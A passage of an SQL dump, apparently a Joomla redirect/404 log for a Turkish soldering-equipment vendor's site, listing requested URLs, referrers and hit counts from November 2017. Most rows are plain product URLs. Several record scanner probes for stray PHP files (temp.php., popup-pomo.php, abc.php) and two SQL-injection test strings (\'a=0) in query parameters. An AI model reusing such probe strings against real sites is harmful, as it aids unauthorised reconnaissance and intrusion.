00:00:00',301),(13326,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,category_name?language=tr-tr',NULL,'','',13,0,'2017-11-22 19:16:33','0000-00-00 00:00:00',301),(13327,'http://3s-technologies.com.tr/tr/urunler/jvk-detail?tmpl=component&print=1',NULL,'','',18,0,'2017-11-22 19:17:05','0000-00-00 00:00:00',301),(13328,'http://3s-technologies.com.tr/tr/images/temp.php.',NULL,'http://site.ru','',2,0,'2017-11-22 19:23:08','0000-00-00 00:00:00',301),(13329,'http://3s-technologies.com.tr/tr/templates/beez/index.php',NULL,'http://site.ru','',85,0,'2017-11-22 19:23:14','0000-00-00 00:00:00',301),(13330,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-11-22 19:47:04','0000-00-00 00:00:00',301),(13331,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-22 19:57:09','0000-00-00 00:00:00',301),(13332,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,ordering/results,1-20',NULL,'','',1,0,'2017-11-22 20:07:26','0000-00-00 00:00:00',301),(13333,'http://3s-technologies.com.tr/index.php/en/products/spr-20-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-22 20:09:46','0000-00-00 00:00:00',301),(13334,'http://3s-technologies.com.tr/tr/tools/popup-pomo.php',NULL,'http://site.ru','',7,0,'2017-11-22 20:09:52','0000-00-00 00:00:00',301),(13335,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,product_name/dirdesc',NULL,'','',1,0,'2017-11-22 20:12:34','0000-00-00 00:00:00',301),(13336,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-100',NULL,'','',1,0,'2017-11-22 20:17:43','0000-00-00 00:00:00',301),(13337,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-22 20:21:35','0000-00-00 00:00:00',301),(13338,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/results,1-10',NULL,'','',2,0,'2017-11-22 20:28:00','0000-00-00 00:00:00',301),(13339,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturers/panasonic',NULL,'','',12,0,'2017-11-22 20:34:40','0000-00-00 00:00:00',301),(13340,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/results,1-5',NULL,'','',8,0,'2017-11-22 20:43:26','0000-00-00 00:00:00',301),(13341,'http://3s-technologies.com.tr/en/products/cs40-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-22 20:58:33','0000-00-00 00:00:00',301),(13342,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku',NULL,'','',37,0,'2017-11-22 21:09:08','0000-00-00 00:00:00',301),(13343,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/results,1-100',NULL,'','',4,0,'2017-11-22 21:09:09','0000-00-00 00:00:00',301),(13344,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-22 21:19:26','0000-00-00 00:00:00',301),(13345,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',389,0,'2017-11-22 21:28:21','0000-00-00 00:00:00',301),(13346,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim?error=404',NULL,'','',1,0,'2017-11-22 21:30:32','0000-00-00 00:00:00',301),(13347,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/panasonic',NULL,'','',11,0,'2017-11-22 21:32:41','0000-00-00 00:00:00',301),(13348,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,category_name',NULL,'','',18,0,'2017-11-22 21:35:55','0000-00-00 00:00:00',301),(13349,'http://3s-technologies.com.tr/en/products/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-22 21:39:16','0000-00-00 00:00:00',301),(13350,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/results,1-20',NULL,'','',3,0,'2017-11-22 21:45:09','0000-00-00 00:00:00',301),(13351,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',420,0,'2017-11-22 21:45:25','0000-00-00 00:00:00',301),(13352,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/panasonic',NULL,'','',12,0,'2017-11-22 21:56:25','0000-00-00 00:00:00',301),(13353,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-22 22:00:34','0000-00-00 00:00:00',301),(13354,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,`p`.product_sku?language=en-gb',NULL,'','',24,0,'2017-11-22 22:24:49','0000-00-00 00:00:00',301),(13355,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,ordering?language=tr-tr',NULL,'','',25,0,'2017-11-22 22:25:28','0000-00-00 00:00:00',301),(13356,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',26,0,'2017-11-22 22:48:54','0000-00-00 00:00:00',301),(13357,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-22 22:50:43','0000-00-00 00:00:00',301),(13358,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',15,0,'2017-11-22 22:51:41','0000-00-00 00:00:00',301),(13359,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-22 23:01:22','0000-00-00 00:00:00',301),(13360,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2017-11-22 23:02:18','0000-00-00 00:00:00',301),(13361,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',54,0,'2017-11-22 23:05:58','0000-00-00 00:00:00',301),(13362,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-11-22 23:07:26','0000-00-00 00:00:00',301),(13363,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-22 23:12:34','0000-00-00 00:00:00',301),(13364,'http://3s-technologies.com.tr/en/products/le-40v-detail?tmpl=component&print=1',NULL,'','',18,0,'2017-11-22 23:14:23','0000-00-00 00:00:00',301),(13365,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-11-22 23:15:38','0000-00-00 00:00:00',301),(13366,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,ordering?language=en-gb',NULL,'','',8,0,'2017-11-22 23:20:39','0000-00-00 00:00:00',301),(13367,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/results,1-100',NULL,'','',11,0,'2017-11-22 23:38:17','0000-00-00 00:00:00',301),(13368,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',235,0,'2017-11-22 23:43:26','0000-00-00 00:00:00',301),(13369,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-22 23:44:54','0000-00-00 00:00:00',301),(13370,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/panasonic',NULL,'','',9,0,'2017-11-22 23:51:55','0000-00-00 00:00:00',301),(13371,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/results,1-100',NULL,'','',3,0,'2017-11-22 23:58:51','0000-00-00 00:00:00',301),(13372,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',8,0,'2017-11-23 00:01:03','0000-00-00 00:00:00',301),(13373,'http://www.3s-technologies.com.tr/tr/users/registration.html',NULL,'http://www.3s-technologies.com.tr/tr/users/registration.html','',1,0,'2017-11-23 00:07:01','0000-00-00 00:00:00',301),(13374,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,ordering',NULL,'','',191,0,'2017-11-23 00:24:34','0000-00-00 00:00:00',301),(13375,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,ordering?error=404&language=en-gb',NULL,'','',1,0,'2017-11-23 00:33:48','0000-00-00 00:00:00',301),(13376,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc/results,1-5',NULL,'','',3,0,'2017-11-23 00:34:51','0000-00-00 00:00:00',301),(13377,'http://www.3s-technologies.com.tr/tr/images/kester/kester_%20kremlehim.png',NULL,'','',23,0,'2017-11-23 00:39:24','0000-00-00 00:00:00',301),(13378,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturers/panasonic',NULL,'','',3,0,'2017-11-23 00:55:31','0000-00-00 00:00:00',301),(13379,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/results,1-10',NULL,'','',4,0,'2017-11-23 01:05:42','0000-00-00 00:00:00',301),(13380,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-10',NULL,'','',11,0,'2017-11-23 01:16:00','0000-00-00 00:00:00',301),(13381,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-23 01:21:08','0000-00-00 00:00:00',301),(13382,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc',NULL,'','',12,0,'2017-11-23 01:33:00','0000-00-00 00:00:00',301),(13383,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc/results,1-50',NULL,'','',3,0,'2017-11-23 01:36:34','0000-00-00 00:00:00',301),(13384,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-11-23 02:01:10','0000-00-00 00:00:00',301),(13385,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',5,0,'2017-11-23 02:17:37','0000-00-00 00:00:00',301),(13386,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim',NULL,'','',19,0,'2017-11-23 02:40:47','0000-00-00 00:00:00',301),(13387,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',221,0,'2017-11-23 02:48:18','0000-00-00 00:00:00',301),(13388,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/rh2-20-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-23 02:49:35','0000-00-00 00:00:00',301),(13389,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',8,0,'2017-11-23 02:49:50','0000-00-00 00:00:00',301),(13390,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-23 02:53:51','0000-00-00 00:00:00',301),(13391,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,category_name/results,1-50',NULL,'','',1,0,'2017-11-23 02:55:36','0000-00-00 00:00:00',301),(13392,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-23 03:05:04','0000-00-00 00:00:00',301),(13393,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturers/panasonic',NULL,'','',25,0,'2017-11-23 03:20:21','0000-00-00 00:00:00',301),(13394,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',23,0,'2017-11-23 03:25:26','0000-00-00 00:00:00',301),(13395,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,product_name?language=tr-tr',NULL,'','',27,0,'2017-11-23 03:27:44','0000-00-00 00:00:00',301),(13396,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/dirdesc',NULL,'','',8,0,'2017-11-23 03:32:30','0000-00-00 00:00:00',301),(13397,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız?language=en-gb',NULL,'','',3,0,'2017-11-23 03:36:32','0000-00-00 00:00:00',301),(13398,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,category_name?language=tr-tr',NULL,'','',24,0,'2017-11-23 03:38:18','0000-00-00 00:00:00',301),(13399,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,mf_name?language=tr-tr',NULL,'','',7,0,'2017-11-23 03:58:23','0000-00-00 00:00:00',301),(13400,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/results,1-40',NULL,'','',3,0,'2017-11-23 04:01:55','0000-00-00 00:00:00',301),(13401,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_sku?language=en-gb',NULL,'','',16,0,'2017-11-23 04:06:23','0000-00-00 00:00:00',301),(13402,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-23 04:11:23','0000-00-00 00:00:00',301),(13403,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-23 04:21:34','0000-00-00 00:00:00',301),(13404,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',7,0,'2017-11-23 04:38:14','0000-00-00 00:00:00',301),(13405,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-11-23 04:40:25','0000-00-00 00:00:00',301),(13406,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,ordering?language=tr-tr',NULL,'','',7,0,'2017-11-23 04:46:48','0000-00-00 00:00:00',301),(13407,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc/results,1-20',NULL,'','',2,0,'2017-11-23 04:58:45','0000-00-00 00:00:00',301),(13408,'http://www.3s-technologies.com.tr/index.php/en/products/jv131-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-23 05:32:29','0000-00-00 00:00:00',301),(13409,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/rh2-20-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-23 05:34:07','0000-00-00 00:00:00',301),(13410,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/lfs-1-detail/askquestion?tmpl=component',NULL,'','',26,0,'2017-11-23 05:51:57','0000-00-00 00:00:00',301),(13411,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name/dirdesc/results,1-20',NULL,'','',7,0,'2017-11-23 06:05:03','0000-00-00 00:00:00',301),(13412,'http://3s-technologies.com.tr/index.php/en/products/flux/955lc-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-23 06:13:57','0000-00-00 00:00:00',301),(13413,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-5',NULL,'','',3,0,'2017-11-23 06:14:32','0000-00-00 00:00:00',301),(13414,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_name?error=404&language=en-gb',NULL,'','',1,0,'2017-11-23 07:20:18','0000-00-00 00:00:00',301),(13415,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name',NULL,'','',8,0,'2017-11-23 07:20:37','0000-00-00 00:00:00',301),(13416,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-23 07:20:51','0000-00-00 00:00:00',301),(13417,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-23 07:30:19','0000-00-00 00:00:00',301),(13418,'http://3s-technologies.com.tr/index.php/tr/ueruenler/245-k100-28-29-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-23 07:31:17','0000-00-00 00:00:00',301),(13419,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-23 07:36:41','0000-00-00 00:00:00',301),(13420,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',7,0,'2017-11-23 07:44:41','0000-00-00 00:00:00',301),(13421,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,ordering',NULL,'','',340,0,'2017-11-23 08:03:17','0000-00-00 00:00:00',301),(13422,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name',NULL,'','',344,0,'2017-11-23 08:03:20','0000-00-00 00:00:00',301),(13423,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',342,0,'2017-11-23 08:03:21','0000-00-00 00:00:00',301),(13424,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_sku',NULL,'','',341,0,'2017-11-23 08:03:26','0000-00-00 00:00:00',301),(13425,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',356,0,'2017-11-23 08:03:32','0000-00-00 00:00:00',301),(13426,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',367,0,'2017-11-23 08:03:53','0000-00-00 00:00:00',301),(13427,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',365,0,'2017-11-23 08:03:55','0000-00-00 00:00:00',301),(13428,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',363,0,'2017-11-23 08:04:00','0000-00-00 00:00:00',301),(13429,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',365,0,'2017-11-23 08:04:01','0000-00-00 00:00:00',301),(13430,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',364,0,'2017-11-23 08:04:06','0000-00-00 00:00:00',301),(13431,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',365,0,'2017-11-23 08:04:07','0000-00-00 00:00:00',301),(13432,'http://www.3s-technologies.com.tr/en/contacts?format=feed&type=rss',NULL,'','',12,0,'2017-11-23 08:08:43','0000-00-00 00:00:00',301),(13433,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-50',NULL,'','',3,0,'2017-11-23 08:17:41','0000-00-00 00:00:00',301),(13434,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/dirdesc',NULL,'','',52,0,'2017-11-23 08:22:54','0000-00-00 00:00:00',301),(13435,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,`p`.product_sku/results,1-50',NULL,'','',10,0,'2017-11-23 08:36:38','0000-00-00 00:00:00',301),(13436,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering/results,1-10',NULL,'','',3,0,'2017-11-23 09:05:04','0000-00-00 00:00:00',301),(13437,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hä±z/npm-detail',NULL,'','',1,0,'2017-11-23 09:10:25','0000-00-00 00:00:00',301),(13438,'http://3s-technologies.com.tr/en/using-joomla/extensions/templates/atomic/home-page-atomic/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',7,0,'2017-11-23 09:15:58','0000-00-00 00:00:00',301),(13439,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/av132-detail/askquestion?tmpl=component',NULL,'','',23,0,'2017-11-23 09:36:08','0000-00-00 00:00:00',301),(13440,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-23 09:52:28','0000-00-00 00:00:00',301),(13441,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',23,0,'2017-11-23 09:58:33','0000-00-00 00:00:00',301),(13442,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,category_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-23 10:01:53','0000-00-00 00:00:00',301),(13443,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,category_name',NULL,'','',19,0,'2017-11-23 10:11:40','0000-00-00 00:00:00',301),(13444,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?option=com_content\'a=0&view=article&id=74:cubuk-lehim&catid=39:lehimleme&itemid=85',NULL,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content\'A=0&view=article&id=74:cubuk-lehim&catid=39:lehimleme&Itemid=85','',1,0,'2017-11-23 10:47:21','0000-00-00 00:00:00',301),(13445,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/?option=com_content&view=article\'a=0&id=74:cubuk-lehim&catid=39:lehimleme&itemid=85',NULL,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article\'A=0&id=74:cubuk-lehim&catid=39:lehimleme&Itemid=85','',1,0,'2017-11-23 10:47:23','0000-00-00 00:00:00',301),(13446,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-41-detail',NULL,'','',21,0,'2017-11-23 10:58:08','0000-00-00 00:00:00',301),(13447,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/results,1-50',NULL,'','',9,0,'2017-11-23 10:58:44','0000-00-00 00:00:00',301),(13448,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-23 11:03:33','0000-00-00 00:00:00',301),(13449,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',7,0,'2017-11-23 11:15:06','0000-00-00 00:00:00',301),(13450,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc?language=en-gb',NULL,'','',5,0,'2017-11-23 12:04:11','0000-00-00 00:00:00',301),(13451,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-23 12:05:05','0000-00-00 00:00:00',301),(13452,'http://www.3s-technologies.com.tr/tr/anasayfa/78-turkish-tr?format=feed&type=rss',NULL,'','',3,0,'2017-11-23 12:17:46','0000-00-00 00:00:00',301),(13453,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',26,0,'2017-11-23 12:23:30','0000-00-00 00:00:00',301),(13454,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-23 12:58:44','0000-00-00 00:00:00',301),(13455,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-23 13:33:53','0000-00-00 00:00:00',301),(13456,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-41-42-detail',NULL,'','',50,0,'2017-11-23 14:10:47','0000-00-00 00:00:00',301),(13457,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-41-detail',NULL,'','',37,0,'2017-11-23 14:10:48','0000-00-00 00:00:00',301),(13458,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-23 14:19:18','0000-00-00 00:00:00',301),(13459,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name?language=tr-tr',NULL,'','',2,0,'2017-11-23 14:20:11','0000-00-00 00:00:00',301),(13460,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-23 14:32:14','0000-00-00 00:00:00',301),(13461,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-23 14:33:39','0000-00-00 00:00:00',301),(13462,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lfs-1-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-23 14:33:51','0000-00-00 00:00:00',301),(13463,'http://3s-technologies.com.tr/en/products/2.-el-makineler/rh6-detail/askquestion?tmpl=component',NULL,'','',18,0,'2017-11-23 14:40:43','0000-00-00 00:00:00',301),(13464,'http://3s-technologies.com.tr/tr/urunler/thru-hole/by,product_name',NULL,'','',28,0,'2017-11-23 14:43:11','0000-00-00 00:00:00',301),(13465,'http://3s-technologies.com.tr/abc.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-23 14:56:22','0000-00-00 00:00:00',301),(13466,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',26,0,'2017-11-23 15:17:26','0000-00-00 00:00:00',301),(13467,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name/dirdesc',NULL,'','',1,0,'2017-11-23 15:28:36','0000-00-00 00:00:00',301),(13468,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-10',NULL,'','',1,0,'2017-11-23 15:37:23','0000-00-00 00:00:00',301),(13469,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by,category_name?language=en-gb',NULL,'','',25,0,'2017-11-23 15:38:55','0000-00-00 00:00:00',301),(13470,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-40',NULL,'','',8,0,'2017-11-23 15:46:10','0000-00-00 00:00:00',301),(13471,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_sku',NULL,'','',39,0,'2017-11-23 15:53:16','0000-00-00 00:00:00',301),(13472,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-detail',NULL,'','',15,0,'2017-11-23 16:26:59','0000-00-00 00:00:00',301),(13473,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,ordering/results,1-20',NULL,'','',9,0,'2017-11-23 16:30:04','0000-00-00 00:00:00',301),(13474,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',201,0,'2017-11-23 16:30:28','0000-00-00 00:00:00',301),(13475,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-23 16:35:09','0000-00-00 00:00:00',301),(13476,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-23 16:37:05','0000-00-00 